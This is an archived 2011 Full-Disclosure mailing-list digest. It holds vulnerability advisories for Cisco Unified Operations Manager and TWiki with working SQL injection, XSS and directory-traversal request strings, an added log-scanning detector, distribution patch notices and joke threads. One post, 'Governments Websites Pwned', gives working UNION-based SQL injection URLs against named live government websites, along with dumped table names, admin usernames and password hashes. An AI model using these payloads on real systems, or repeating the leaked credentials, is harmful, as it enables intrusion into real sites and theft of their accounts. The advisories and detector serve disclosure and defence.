[Full-disclosure] Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006

2011-05-18 Thread Lists
Sense of Security - Security Advisory - SOS-11-006

Release Date.  18-May-2011
Last Update.   -
Vendor Notification Date.  28-Feb-2011
Product.   Cisco Unified Operations Manager
   Common Services Framework Help Servlet
   Common Services Device Center
   CiscoWorks Homepage
   Note: All of the above products are
   included by default in CuOM.
Platform.  Microsoft Windows
Affected versions. CuOM 8.0 and 8.5 (verified),
   possibly others.
Severity Rating.   Medium - Low
Impact.    Database access, cookie and credential
   theft, impersonation, loss of
   confidentiality, local file disclosure,
   information disclosure.
Attack Vector. Remote with authentication
Solution Status.   Vendor patch (upgrade to CuOM 8.6 as
   advised by Cisco)
CVE reference. CVE-2011-0959 (CSCtn61716)
   CVE-2011-0960 (CSCtn61716)
   CVE-2011-0961 (CSCto12704)
   CVE-2011-0962 (CSCto12712)
   CVE-2011-0966 (CSCto35577)

Details.
Cisco Unified Operations Manager (CuOM) is an NMS for voice developed by
Cisco Systems. Operations Manager monitors and evaluates the current
status of both the IP communications infrastructure and the underlying
transport infrastructure in your network.

Multiple vulnerabilities have been identified in Cisco Unified
Operations Manager and associated products. These vulnerabilities
include multiple blind SQL injections, multiple XSS issues, and a
directory traversal vulnerability.

1. Blind SQL injection vulnerabilities that affect CuOM
CVE-2011-0960 (CSCtn61716):
The variable CCMs of PRTestCreation can trigger a blind SQL injection
vulnerability when supplied with a single quote followed by a time-delay
call:
/iptm/PRTestCreation.do?RequestSource=dashboardMACs=CCMs='waitfor%20
delay'0:0:20'--Extns=IPs=

Additionally, the variable ccm of TelePresenceReportAction can trigger a
blind SQL injection vulnerability when supplied with a single quote:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--

2. Reflected XSS vulnerabilities that affect CuOM
CVE-2011-0959 (CSCtn61716):
/iptm/advancedfind.do?extn=73fcb/scriptscriptalert(1)/script23fb
e43447
/iptm/ddv.do?deviceInstanceName=f3806%3balert(1)//9b92b050cf5deviceC
apability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099scriptalert(1)/scriptf813ea8c
06ddeviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99bscriptalert(1)/script542256870
d5viewname=device.filteroperation=getFilterdojo.preventCache=129851
8961028
/iptm/eventmon?cmd=getDeviceDatagroup=/3309dscriptalert(1)/script
09520eb762cdojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84%3b
alert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8%3ba
lert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=ccmName=ed1b1%3balert(1)//cda6137ae
4c
/iptm/logicalTopo.do?clusterName=db4c1%3balert(1)//4031caf63d7

Reflected XSS vulnerability that affects Common Services Device Center
CVE-2011-0962 (CSCto12712):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc
tionhomepage61a8b%3balert(1)//4e9adfb2987

Reflected XSS vulnerability that affects Common Services Framework
Help Servlet CVE-2011-0961 (CSCto12704):
/cwhp/device.center.do?device=72a9fscriptalert(1)/script5f5251a
aad=1

3. Directory traversal vulnerability that affects CiscoWorks Homepage
CVE-2011-0966 (CSCto35577):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program 
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope
rties
DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program 
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper
ties
Note: When reading large files such as this file, ensure the row
limit is adjusted to 500 for example.
DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program 
Files\CSCOpx\log\dbpwdChange.log

Solution.
Upgrade to CuOM 8.6.
Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and
CSCto35577 for information on patches and availability of fixes.

Discovered by.
Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier 
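As an added example, not code from the Sense of Security advisory or from Cisco, the following Python scanner flags web access-log requests against the CuOM/CiscoWorks endpoints listed above (time-delay probes on the two SQLi parameters, script/alert markers under the XSS paths, and `..\`-style values in the auditLog.do `file` parameter). The endpoint table, the regexes and the combined-format log lines are assumptions built from the advisory text; the log lines are constructed.

```python
"""Flag requests against the CuOM/CiscoWorks endpoints named in SOS-11-006.

Added example, not code from the advisory or from Cisco. The endpoint table,
the regexes and the sample log lines are assumptions built from the advisory
text; the log lines are constructed and nothing is fetched from a host.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/Tomcat combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Item 1 of the advisory: parameters that accept a time-delay blind SQLi probe.
SQLI_PARAMS = {
    "/iptm/PRTestCreation.do": {"CCMs"},
    "/iptm/TelePresenceReportAction.do": {"ccm"},
}
# Item 2: the reflected-XSS pages all live under these prefixes.
XSS_PATH_PREFIXES = ("/iptm/", "/CSCOnm/servlet/", "/cwhp/")
# Item 3: the CiscoWorks Homepage audit-log viewer and its 'file' parameter.
TRAVERSAL_ENDPOINT = "/cwhp/auditLog.do"

TIME_DELAY_RE = re.compile(r"waitfor\s+delay", re.I)  # the probe the advisory uses
XSS_RE = re.compile(r"<\s*/?\s*script|\balert\s*\(|javascript:", re.I)
# '..\' or '../' as in the advisory, plus absolute Windows/UNC paths (a generalisation).
TRAVERSAL_RE = re.compile(r"\.\.[\\/]|^[a-zA-Z]:[\\/]|^[\\/]{1,2}")


def decode(value, rounds=3):
    """URL-decode until stable so double-encoded payloads are inspected decoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target):
    """Return the list of (rule, parameter) findings a request target matches."""
    parts = urlsplit(target)
    path = decode(parts.path)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode(value)  # parse_qsl decoded once; peel further layers
        if path == TRAVERSAL_ENDPOINT and name == "file" and TRAVERSAL_RE.search(value):
            findings.append(("directory-traversal", name))
        if name in SQLI_PARAMS.get(path, ()) and TIME_DELAY_RE.search(value):
            findings.append(("time-based-blind-sqli", name))
        if path.startswith(XSS_PATH_PREFIXES) and XSS_RE.search(value):
            findings.append(("reflected-xss", name))
    return findings


def scan(lines):
    """Parse access-log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        findings = classify(m["target"])
        if findings:
            alerts.append({
                "src": m["src"], "ts": m["ts"], "status": m["status"],
                "path": urlsplit(m["target"]).path,
                "rules": [rule for rule, _ in findings],
                "params": sorted({param for _, param in findings}),
            })
    return alerts


# Constructed sample: four probes mirroring the advisory plus one benign request.
SAMPLE_LOG = [
    r'10.0.0.5 - - [18/May/2011:10:01:02 +1000] "GET /cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini HTTP/1.1" 200 1321',
    r'10.0.0.5 - - [18/May/2011:10:01:09 +1000] "GET /iptm/TelePresenceReportAction.do?ccm=%27waitfor%20delay%270:0:20%27-- HTTP/1.1" 200 20',
    r'10.0.0.7 - - [18/May/2011:10:02:11 +1000] "GET /iptm/logicalTopo.do?clusterName=db4c1%3balert(1)//4031caf63d7 HTTP/1.1" 200 5010',
    r'10.0.0.8 - - [18/May/2011:10:03:00 +1000] "GET /cwhp/auditLog.do?file=audit.log HTTP/1.1" 200 880',
    r'10.0.0.9 - - [18/May/2011:10:03:30 +1000] "GET /iptm/ddv.do?deviceInstanceName=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["src"]} {alert["path"]} -> '
              f'{", ".join(alert["rules"])} via {alert["params"]}')
```

The last sample line is double-encoded, which is why `decode` loops until the value stops changing before the patterns are applied.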

[Full-disclosure] Governments Websites Pwned !!

2011-05-18 Thread aryan hacky
 _  _   _  ___   _  _
/ \   _ __ | |_(_)|_ _|_ __ | |_ _ __ _   _  __| | ___ _ __ ___
   / _ \ | '_ \| __| |_| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __|
  / ___ \| | | | |_| |_| || | | | |_| |  | |_| | (_| |  __/ |  \__ \
 /_/   \_\_| |_|\__|_||___|_| |_|\__|_|   \__,_|\__,_|\___|_|  |___/
  .com

Lolzz following GOV sites SQL Injection is working from last years.
Why they don't like to patch it !!
Pretty lazy people are in government sectors like their lazy jobs.
Many newbies are learning SQL injection from the Gov. sites :p lolz ..
I think it is time to wake up ..

Here All MySQL Version 5 And Version 4 Websites are injected !

Special Thanks to Silic0n 

Work Done By @r@yn...

---
---
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13--

DB:eproc_seznepal_gov_np

---
---

http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Table:
tbl_acknowledgement,
tbl_addenda,
tbl_admin_info,
tbl_adminlogin,
tbl_agency,
tbl_agency_category,
tbl_announcement,
tbl_archive_auction,
tbl_archive_tender,
tbl_award,tbl_award1,
tbl_bid,tbl_bid_document,
tbl_bid_document_additional,
tbl_bid_modification,
tbl_clarification,
tbl_company_category,
tbl_contract,tbl_customer,
tbl_faq,tbl_information,
tbl_info
---
---

http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29--

columns:

acknowledgementid,
provider_id,
agency_id,
project_id,
project_type,
project_name,
activity,
date,
time,ip,
addendaid,
noticeid,
date,
newspaper,
description,
filename,
filetype,
filesize,
document,
admin_id,
firstname,
lastname,
email_addr,
secret_question,
answer,
admin_id,
user_name,
pass_word,
user_level,
agency_id,
organization_name,
organization_reg_num,
vat_num

table

tbl_acknowledgement:acknowledgementid,
tbl_acknowledgement:provider_id,
tbl_acknowledgement:agency_id,
tbl_acknowledgement:project_id,
tbl_acknowledgement:project_type,
tbl_acknowledgement:project_name,
tbl_acknowledgement:activity,
tbl_acknowledgement:date,
tbl_acknowledgement:time,
tbl_acknowledgement:ip,
tbl_addenda:addendaid,
tbl_addenda:noticeid


http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13
from tbl_adminlogin--

ADMIN:   1:sez:7a4489303e667e03b6414997b53aa003

---
---


http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29--
DB:national_nm

---
---

http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29--

table:admin,events,news

---
---

http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29--

col:
id,
username,
password,
events_id,
date,
events_title,
events_short_desc,
events_full_desc,
enabled,
id,date,
news_title,
news_short_desc,
author,
news_full_desc,enabled


---
---

http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin--

admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623


---
---


http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,@@version,3,4,5,6%20--

version:5.0.51a-24+lenny5-log


---
---


[Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread tehseen sagar
Greetings,
   I would like to know whether any local root exploit exists for Linux
kernel 2011. I have seen such a video on SecurityTube and YouTube. I wonder
whether any PoC of such a thing is available, so I can analyze and test it in
my lab environment. Looking forward to your kind response.

 Regards
   Lee

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] XSS vulnerability in TWiki 5.0.2

2011-05-18 Thread Netsparker Advisories
Information
---
Name :  XSS vulnerability in TWiki
Software :  TWiki 5.0.1 and possibly below.
Vendor Homepage :  http://twiki.org/
Vulnerability Type :  Cross-Site Scripting
Severity :  High
Researcher :  Mesut Timur mesut [at] mavitunasecurity [dot] com
Advisory Reference :  NS-11-005
CVE :  CVE-2011-1838


Description
---
TWiki® is a flexible, powerful, and easy to use enterprise wiki, enterprise
collaboration platform, and web application platform. It is a Structured
Wiki, typically used to run a project development space, a document
management system, a knowledge base, or any other groupware tool, on an
intranet, extranet or the Internet.


Details
---
TWiki is affected by XSS vulnerabilities in version 5.0.1.
Example PoC URLs are as follows:

http://example.com/bin/login?sudo=sudo;origurl=http://example.com/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E
http://example.com/bin/login/Main/WebHome?
'1=;origurl=1'--/style/scriptscriptalert(0x00039C)/script

You can read the full article about Cross-Site Scripting vulnerabilities
here: http://www.mavitunasecurity.com/crosssite-scripting-xss/


Solution
---
Upgrade to the latest TWiki version (5.0.2).


Credits
---
It was discovered during testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.


References
---
Vendor Url : http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2011-1838
MSL Advisory Link :
http://www.mavitunasecurity.com/XSS-vulnerability-in-Twiki/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
---
Netsparker® can find and report security issues such as SQL Injection and
Cross-site Scripting (XSS) in all web applications regardless of the
platform and the technology they are built on. Netsparker's unique detection
and exploitation techniques allow it to be dead accurate in reporting, hence
it is the first and the only False Positive Free web application security
scanner.

-- 
Netsparker Advisories, advisor...@mavitunasecurity.com
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

[Full-disclosure] SUSE Security Announcement: flash-player (SUSE-SA:2011:025)

2011-05-18 Thread Thomas Biege

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:flash-player
Announcement ID:SUSE-SA:2011:025
Date:   Tue, 17 May 2011 12:00:00 +
Affected Products:  openSUSE 11.3
openSUSE 11.4
SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8
SUSE Default Package:   yes
Cross-References:   CVE-2011-0589, CVE-2011-0618, CVE-2011-0619
CVE-2011-0620, CVE-2011-0621, CVE-2011-0622
CVE-2011-0623, CVE-2011-0624, CVE-2011-0625
CVE-2011-0626, CVE-2011-0627

Content of This Advisory:
1) Problem Description
 flash-player security update to 10.3
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Flash Player has been updated to version 10.3, fixing bugs
   and security issues.
   - CVE-2011-0589: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Buffer Errors (CWE-119)
   - CVE-2011-0618: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Numeric Errors (CWE-189)
   - CVE-2011-0619: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Buffer Errors (CWE-119)
   - CVE-2011-0620: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Buffer Errors (CWE-119)
   - CVE-2011-0621: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Buffer Errors (CWE-119)
   - CVE-2011-0622: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Buffer Errors (CWE-119)
   - CVE-2011-0623: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Input Validation (CWE-20)
   - CVE-2011-0624: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Input Validation (CWE-20)
   - CVE-2011-0625: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Input Validation (CWE-20)
   - CVE-2011-0626: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Input Validation (CWE-20)
   - CVE-2011-0627: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P):
 Input Validation (CWE-20)
 
   More information can be found on:
   http://www.adobe.com/support/security/bulletins/apsb11-12.html

2) Solution or Work-Around

   If supported by the browser, you can disable the flash plugin.

3) Special Instructions and Notes

   After the flash player update has been installed, all programs utilizing
   the flash plugin should be restarted. In particular, web browser sessions
   should be restarted.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update module or the zypper commandline tool. The package and
   patch management stack will detect which updates are required and
   automatically perform the necessary steps to verify and install them.

   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   
   x86 Platform:
   
   openSUSE 11.4:
   
http://download.opensuse.org/update/11.4/rpm/i586/flash-player-10.3.181.14-0.2.1.i586.rpm
   
   openSUSE 11.3:
   
http://download.opensuse.org/update/11.3/rpm/i586/flash-player-10.3.181.14-0.2.1.i586.rpm
   
   Sources:
   
   openSUSE 11.4:
   
http://download.opensuse.org/update/11.4/rpm/src/flash-player-10.3.181.14-0.2.1.nosrc.rpm
   
   openSUSE 11.3:
   
http://download.opensuse.org/update/11.3/rpm/src/flash-player-10.3.181.14-0.2.1.nosrc.rpm
   
   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web:
   
   SUSE Linux Enterprise Desktop 10 SP4
 
http://download.novell.com/patch/finder/?keywords=9c4e6f8f60161b73ef86d4ce0079ed69
   
   SUSE Linux Enterprise Desktop 11 SP1
 
http://download.novell.com/patch/finder/?keywords=25f459f5151ec35f0bbe1202ce1245ad

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

 See SUSE Security Summary Report.

__

6) Authenticity Verification and Additional Information

  - 

[Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Joxean Koret
Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have
exploits for Linux XP.

 I would like to know whether any local root exploit exists for Linux
 kernel 2011.



[Full-disclosure] Vivek's latest wireless challange - $50 up for grabs

2011-05-18 Thread corpus.defero
http://www.securitytube.net/video/1884

Just posted



Re: [Full-disclosure] Governments Websites Pwned !!

2011-05-18 Thread Cal Leeming
Welcome to 101 of stay out of jail.. Today's topic is: How not to piss off
the govt.

:|

On Wed, May 18, 2011 at 8:54 AM, aryan hacky aryan.ha...@gmail.com wrote:

Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Cal Leeming
linux kernel 2011?? what the fuck are you talking about?

On Wed, May 18, 2011 at 10:41 AM, Joxean Koret joxeanko...@yahoo.es wrote:

 Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have
 exploits for Linux XP.

 I would like to know whether any local root exploit exists for Linux
 kernel 2011.



[Full-disclosure] [ MDVSA-2011:091 ] perl

2011-05-18 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:091
 http://www.mandriva.com/security/
 ___

 Package : perl
 Date: May 18, 2011
 Affected: 2009.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in perl:
 
 The (1) lc, (2) lcfirst, (3) uc, and (4) ucfirst functions in Perl
 5.10.x, 5.11.x, and 5.12.x through 5.12.3, and 5.13.x through 5.13.11,
 do not apply the taint attribute to the return value upon processing
 tainted input, which might allow context-dependent attackers to bypass
 the taint protection mechanism via a crafted string (CVE-2011-1487).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1487
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  

Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Paul Heinlein
On Wed, 18 May 2011, Joxean Koret wrote:

 Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have
 exploits for Linux XP.

This is so true, and it's maddening because those same exploits were
also present in Linux OS 9. You won't have to dig hard to find them.

 I would like to know whether any local root exploit exists for
 Linux kernel 2011.

-- 
Paul Heinlein  heinl...@madboa.com  http://www.madboa.com/



Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread phocean
 On Wed, 18 May 2011 07:04:32 -0700 (PDT), Paul Heinlein wrote:
 On Wed, 18 May 2011, Joxean Koret wrote:

 Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you 
 have
 exploits for Linux XP.

 This is so true, and it's maddening because those same exploits were
 also present in Linux OS 9. You won't have to dig hard to find them.

 I would like to know whether any local root exploit exists for
 Linux kernel 2011.

 Can't wait for Linux 2012. These Electronic Arts guys are geniuses.

-- 
 phocean



[Full-disclosure] [ MDVSA-2011:092 ] perl-IO-Socket-SSL

2011-05-18 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:092
 http://www.mandriva.com/security/
 ___

 Package : perl-IO-Socket-SSL
 Date: May 18, 2011
 Affected: 2010.1
 ___

 Problem Description:

 A vulnerability has been found and corrected in perl-IO-Socket-SSL:
 
 IO::Socket::SSL Perl module 1.35, when verify_mode is not VERIFY_NONE,
 fails open to VERIFY_NONE instead of throwing an error when a
 ca_file/ca_path cannot be verified, which allows remote attackers to
 bypass intended certificate restrictions (CVE-2010-4334).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4334
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Re: [Full-disclosure] Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006

2011-05-18 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

This is the Cisco PSIRT response to the vulnerabilities that were
discovered and reported to Cisco Systems by Brett Gervasoni of Sense of
Security, regarding multiple vulnerabilities in Cisco Unified Operations
Manager (CuOM).

We greatly appreciate the opportunity to work with researchers on
security vulnerabilities and welcome the opportunity to review and
assist in product reports.

These vulnerabilities are documented in the following Cisco bug IDs and
Intellishield vulnerability alerts:

* CSCtn61716: XSS and SQL Blind Vulnerabilities in Cisco Unified
Operations Manager

Intellishield vulnerability alerts:

SQL Blind Injection:

http://tools.cisco.com/security/center/viewAlert.x?alertId=23085

CuOM XSS Vulnerabilities:

http://tools.cisco.com/security/center/viewAlert.x?alertId=23086

* CSCto12704: Reflected Cross Site Scripting into ServerHelpEngine
servlet

Intellishield vulnerability alert:

http://tools.cisco.com/security/center/viewAlert.x?alertId=23088

* CSCto12712: XSS vulnerability in CuOM Device Center

Intellishield vulnerability alert:

http://tools.cisco.com/security/center/viewAlert.x?alertId=23087

* CSCto35577: Directory Traversal vulnerabilities in CWHP

Intellishield vulnerability alert:

http://tools.cisco.com/security/center/viewAlert.x?alertId=23089


Information related to affected software versions and fixed software is
available in the published Intellishield vulnerability alerts and the
Cisco Bug ID release note enclosures.

Cisco PSIRT




Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread John Jacobs

Apologies in advance for thread-jacking but does someone happen to have a spare 
GNU/Linux CD-Key for sale?  I'm having some issues with Linux Genuine Advantage 
for Linux Kernel 2011 Home Edition.  I did recently change my motherboard and 
evidently it was an OEM license and LGA went crazy.

Please do not recommend a Linux key-gen, I do not pirate GNU/Linux!  I've seen 
many of these Linux torrents floating around and the last thing I want is to be 
sued over downloading Linux!  Amazingly many of them are right out there in the 
open too!

Kind Regards,
John Jacobs
  


Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Joxean Koret
But they don't work if EMET for Linux OS 9 is installed.

On Wed, 18-05-2011 at 07:04 -0700, Paul Heinlein wrote:
 This is so true, and it's maddening because those same exploits were
 also present in Linux OS 9. You won't have to dig hard to find them. 



Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Mario Vilas
Hi, just a quick question, do those exploits you mention work in a
jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet.

On Wed, May 18, 2011 at 11:41 AM, Joxean Koret joxeanko...@yahoo.es wrote:

 Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have
 exploits for Linux XP.

 I would like to know is there any local root exploit exist for linux
 kernel 2011 .





-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”

[Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public

2011-05-18 Thread Stefano Di Paola
What is DOMinator?
DOMinator is a Firefox-based software for analysis and identification of
DOM Based Cross Site Scripting issues (DOMXss).
It is the first runtime tool which can help security testers to identify
DOMXss.

How does it work?

It uses a dynamic runtime tainting model on strings and can trace back
taint propagation operations in order to understand if a DOMXss
vulnerability is actually exploitable.
...

If you're interested in it continue the reading here:
http://blog.mindedsecurity.com/2011/05/dominator-project.html 

More whitepapers in the next days.

Cheers 
Stefano



-- 
...oOOo...oOOo
Stefano Di Paola
Software & Security Engineer

Owasp Italy R&D Director

Web: www.wisec.it
Twitter: http://twitter.com/WisecWisec
..





Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread root
You can only jailbreak FreeBSD devices.

On 05/18/2011 01:37 PM, Mario Vilas wrote:
 Hi, just a quick question, do those exploits you mention work in a
 jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet.
 



[Full-disclosure] [ MDVSA-2011:093 ] gnome-screensaver

2011-05-18 Thread security
 ___

 Mandriva Linux Security Advisory MDVSA-2011:093
 http://www.mandriva.com/security/
 ___

 Package : gnome-screensaver
 Date: May 18, 2011
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in gnome-screensaver:
 
 gnome-screensaver 2.14.3, 2.22.2, 2.27.x, 2.28.0, and 2.28.3, when the
 X configuration enables the extend screen option, allows physically
 proximate attackers to bypass screen locking, access an unattended
 workstation, and view half of the GNOME desktop by attaching an
 external monitor (CVE-2010-0285).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0285
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 ca90f4615f735029808f23dbdc79355d  mes5/i586/gnome-screensaver-2.24.0-1.1mdvmes5.2.i586.rpm
 f87e148836373deac42848cf6df47b89  mes5/SRPMS/gnome-screensaver-2.24.0-1.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 b784b6bf8da7fac869ef5a63f5c3f6e7  mes5/x86_64/gnome-screensaver-2.24.0-1.1mdvmes5.2.x86_64.rpm
 f87e148836373deac42848cf6df47b89  mes5/SRPMS/gnome-screensaver-2.24.0-1.1mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Stephen
This made my morning :D

On 18/05/11 19:11, Joxean Koret wrote:
 Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have
 exploits for Linux XP.

 I would like to know is there any local root exploit exist for linux
 kernel 2011 .




Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread Kevin Wilcox
